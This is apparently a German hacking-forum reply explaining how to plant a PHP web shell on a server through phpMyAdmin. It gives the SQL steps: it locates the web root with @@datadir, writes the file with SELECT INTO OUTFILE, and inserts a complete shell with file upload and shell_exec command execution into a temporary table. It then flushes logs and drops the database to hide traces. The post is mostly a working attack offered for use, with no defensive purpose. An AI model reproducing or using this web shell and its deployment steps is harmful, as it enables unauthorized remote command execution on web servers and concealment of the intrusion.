wozu die datenbank, buster?
es gibt doch auch server da hat man kein recht, eine db anzulegen - brauchst du ja auch nicht.
es reicht, wenn du dir bei /pma/sql.php über select @@datadir oder select @@basedir das docroot anzeigen lässt und dann
SELECT SHELLCODE INTO OUTFILE '/var/www/shell.php' ; --
eingibst. bzw dann das docroot aus dem entsprechenden fall. das anlegen einer datenbank ist in keinem fall notwendig und wenn, kann man dies auch in einem schritt machen:
Code:
CREATE DATABASE ficker;
use ficker;
CREATE TABLE shell (codetab text);
INSERT INTO shell(codetab) VALUES ('Upload your file:<form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"];?>" method="post"><input type = "hidden" name = "MAX_FILE_FILE" value = "3096000" /><input type = "file" name = "fileupload"><input type = "submit" value = "Upload!"></form><?php $uploaddir = getcwd() ."\\\\\\\\"; $uploadfile = $uploaddir.basename($_FILES["fileupload"]["name"]); print "<pre>"; if (move_uploaded_file($_FILES["fileupload"]["tmp_name"],$uploadfile)){print " File stored ok...";} print "</pre>"; ?><hr>CMD: <? $cmd = $_REQUEST["-cmd"]; ?> <html><head><title>Got Shell?</title><style type="text/css"><!-- body {color: #CC0000;background-color:#000000;} --></style></head><body> <onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"> <input type = "submit" value ="Exec"><hr> <pre> <? if($cmd != "") print Shell_Exec($cmd); ?> </pre></form></body></html>
');
SELECT * INTO OUTFILE '/var/www/shell.php'FROM shell;
FLUSH LOGS ;
DROP DATABASE `ficker`
bin eher so das bequeme scriptkiddie